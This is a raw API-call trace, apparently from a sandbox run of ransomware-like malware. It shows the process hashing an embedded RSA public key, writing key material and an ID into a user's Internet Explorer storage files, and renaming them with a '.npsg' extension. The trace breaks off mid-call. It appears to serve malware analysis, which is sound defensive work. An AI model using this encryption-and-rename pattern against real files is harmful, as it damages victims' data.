[0246.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0246.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89150 [0246.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890f0 [0246.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0246.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89108 [0246.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0246.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890d8 [0246.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89168 [0246.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0246.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0246.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89138 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89120 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89180 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89120 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89120 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89138 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890f0 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b890f0 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89150 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bc90 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89180 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890f0 | out: hHeap=0x620000) returned 1 [0246.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0246.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0246.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33a9510 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a110 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a9510 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e3b68 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89120 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89168 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89108 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890d8 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890c0 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fe80 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0246.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0246.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0246.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0246.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0246.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0246.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.229] WriteFile (in: hFile=0x644, lpBuffer=0x39afb24*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x39afb24*, lpNumberOfBytesWritten=0x39afb14*=0x8, lpOverlapped=0x0) returned 1 [0246.229] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.229] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0246.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0246.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0246.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa00 [0246.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0246.229] WriteFile (in: hFile=0x644, lpBuffer=0x346fa00*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa00*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0246.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.230] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.230] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.230] CloseHandle (hObject=0x644) returned 1 [0246.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf0) returned 0x33b8188 [0246.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x900) returned 0x3b8ccd0 [0246.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.231] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.npsg")) returned 1 [0246.232] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 0 [0246.233] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.233] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8888 [0246.233] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.233] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\") returned="3O75JDME\\" [0246.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393e80 [0246.233] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0246.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0246.233] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0246.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0246.233] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0246.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0246.233] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0246.233] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fe80 [0246.234] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.235] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.235] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.235] PathFindFileNameW (pszPath="") returned="" [0246.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.235] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.236] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.236] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 1 [0246.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0246.236] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned=".xml" [0246.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.237] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=13) returned 1 [0246.237] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.239] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.239] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0xd, lpOverlapped=0x0) returned 1 [0246.240] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0246.240] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.240] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.240] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.241] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.241] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.241] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0246.241] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.241] GetLastError () returned 0x0 [0246.241] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.241] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.241] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.241] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.241] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.242] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0246.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa00 [0246.242] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.242] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0246.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0246.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0246.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa00 [0246.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0246.242] WriteFile (in: hFile=0x644, lpBuffer=0x346fa00*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa00*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0246.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.243] lstrlenA 